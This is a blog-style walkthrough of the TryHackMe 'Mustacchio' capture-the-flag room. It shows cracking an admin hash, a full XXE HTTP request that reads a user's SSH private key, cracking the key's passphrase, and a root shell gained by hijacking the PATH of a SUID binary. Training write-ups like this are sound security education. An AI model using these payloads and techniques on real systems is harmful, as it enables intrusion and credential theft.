---
layout: post
title:  "THM: Mustacchio"
date:   2021-06-12 19:00:00 +1000
category: hacking
---

## THM: Mustacchio
This is [Mustacchio](https://tryhackme.com/room/mustacchio) from THM. It's easy rated with no hints; let's go.

## Ports
SSH, a 'normal' HTTP port (i.e. on Port 80) and nginx on port 8765.

## Normal HTTP 
Let's start there. It's a blog about mustaches; not much to see. Some enumeration leads us to /custom/js, which contains *users.bak*, which is:

>SQLite 3.x database, last written using SQLite version 3034001

We can open it up, grab a hash for *admin* and crack it with john:

{% highlight shell %}
┌──(root💀kali)-[/opt/thm/mustache]
└─# john hash -w=/usr/share/wordlists/rockyou.txt                    
Warning: detected hash type "Raw-SHA1", but the string is also recognized as "Raw-SHA1-AxCrypt"
Use the "--format=Raw-SHA1-AxCrypt" option to force loading these as that type instead
Warning: detected hash type "Raw-SHA1", but the string is also recognized as "Raw-SHA1-Linkedin"
Use the "--format=Raw-SHA1-Linkedin" option to force loading these as that type instead
Warning: detected hash type "Raw-SHA1", but the string is also recognized as "ripemd-160"
Use the "--format=ripemd-160" option to force loading these as that type instead
Warning: detected hash type "Raw-SHA1", but the string is also recognized as "has-160"
Use the "--format=has-160" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-SHA1 [SHA1 256/256 AVX2 8x])
Warning: no OpenMP support for this hash type, consider --fork=2
Press 'q' or Ctrl-C to abort, almost any other key for status
bulldog19        (?)
1g 0:00:00:00 DONE (2021-06-12 02:20) 16.66g/s 11401Kp/s 11401Kc/s 11401KC/s bulldog27..bullcrap1
Use the "--show --format=Raw-SHA1" options to display all of the cracked passwords reliably
Session completed
{% endhighlight %}

Now what?

## Port 8765
At port 8765 we have an admin login, so we login. Once we get in, we get a page where we can add a comment to the blog. In the page source we see it's expecting XML and we get a link to http://10.10.206.203:8765/auth/dontforget.bak, which has an example request:

{% highlight shell %}
┌──(root💀kali)-[/opt/thm/mustache]
└─# cat dontforget.bak 
<?xml version="1.0" encoding="UTF-8"?>
<comment>
  <name>Joe Hamd</name>
  <author>Barry Clad</author>
  <com>An unnecessarily long paragraph which I have trimmed</com>
</comment>    
{% endhighlight %}

We also see this comment (in the page source):

>Barry, you can now SSH in using your key!

So what are we doing here? Getting the SSH key with an XXE attack. Here's my payload:

{% highlight html %}
POST /home.php HTTP/1.1
Host: 10.10.206.203:8765
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 1066
Origin: http://10.10.206.203:8765
Connection: close
Referer: http://10.10.206.203:8765/home.php
Cookie: PHPSESSID=9tp014noj2vk3h3vp9v20jq716
Upgrade-Insecure-Requests: 1

xml=<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///home/barry/.ssh/id_rsa"> ]>
<comment>
  <name>%26xxe;</name>
  <author>gh</author>
  <com>The long paragraph whatever</com>
</comment> 
{% endhighlight %}

Now this did actually take me a while to figure out, even though I knew it was XXE. What was happening was that anytime '&' was used, the request was dropped. So you have to URL encode the '&' to get the attack to work.

The SSH key is encrypted but we can crack that and log in:

{% highlight shell %}
┌──(root💀kali)-[/opt/thm/mustache]
└─# python /usr/share/john/ssh2john.py key > key.john
                                              
┌──(root💀kali)-[/opt/thm/mustache]
└─# john key.john -w=/usr/share/wordlists/rockyou.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 2 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
urieljames       (key)
1g 0:00:00:03 DONE (2021-06-12 03:49) 0.2732g/s 3918Kp/s 3918Kc/s 3918KC/sa6_123..*7¡Vamos!
Session completed
                                              
┌──(root💀kali)-[/opt/thm/mustache]
└─# chmod 600 key
                                              
┌──(root💀kali)-[/opt/thm/mustache]
└─# ssh -i key barry@10.10.206.203                         
Enter passphrase for key 'key': 
Welcome to Ubuntu 16.04.7 LTS (GNU/Linux 4.4.0-210-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

13 packages can be updated.
10 of these updates are security updates.
To see these additional updates run: apt list --upgradable



The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

barry@mustacchio:~$
{% endhighlight %}

## Root
Some manual enumeration finds an unusual SUID binary:

{% highlight shell %}
barry@mustacchio:/home/joe$ ls -lash
total 28K
4.0K drwxr-xr-x 2 joe  joe  4.0K Apr 29 20:32 .
4.0K drwxr-xr-x 4 root root 4.0K Apr 29 20:32 ..
 20K -rwsr-xr-x 1 root root  17K Apr 29 20:32 live_log
barry@mustacchio:/home/joe$ file live_log
live_log: setuid ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=6c03a68094c63347aeb02281a45518964ad12abe, for GNU/Linux 3.2.0, not stripped
{% endhighlight %}

What does it do?

{% highlight shell %}
barry@mustacchio:/home/joe$ ./live_log
10.9.10.123 - - [12/Jun/2021:07:46:48 +0000] "POST /home.php HTTP/1.1" 200 1123 "http://10.10.206.203:8765/home.php" "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0"
# etc
{% endhighlight %}

It appears to be reading the nginx log. If we go look, we can read the log but not write to it, since we are in the adm group:

{% highlight shell %}
barry@mustacchio:/var/log/nginx$ ls -lash
total 8.2M
4.0K drwxr-xr-x  2 root     adm    4.0K Apr 29 20:32 .
4.0K drwxrwxr-x 10 root     syslog 4.0K Apr 29 20:52 ..
8.0M -rw-r-----  1 www-data adm    8.0M Jun 12 07:48 access.log
188K -rw-r-----  1 www-data adm    181K Jun 12 07:47 error.log
{% endhighlight %}

I exfil the file with SCP:

{% highlight shell %}
┌──(root💀kali)-[/opt/thm/mustache]
└─# scp -i key barry@10.10.239.174:/home/joe/live_log ./live_log            
Enter passphrase for key 'key': 
live_log  
{% endhighlight %}

And check the contents with 'strings'

{% highlight shell %}
# snip
Live Nginx Log Reader
tail -f /var/log/nginx/access.log
:*3$"
GCC: (Ubuntu 9.3.0-17ubuntu1~20.04) 9.3.0
# snip
{% endhighlight %}

So the binary is running as root and calling 'tail' without a path. We know what to do:

{% highlight shell %}
barry@mustacchio:/home/joe$ which tail
/usr/bin/tail
barry@mustacchio:/home/joe$ cd /dev/shm
barry@mustacchio:/dev/shm$ echo sh > tail
barry@mustacchio:/dev/shm$ chmod +x tail
barry@mustacchio:/dev/shm$ export PATH=/dev/shm:$PATH
barry@mustacchio:/dev/shm$ /home/joe/live_log
# cd /root
# id;hostname;date
uid=0(root) gid=0(root) groups=0(root),4(adm),1003(barry)
mustacchio
Sat Jun 12 08:59:44 UTC 2021
#
{% endhighlight %}

Good one *zyeinn*.
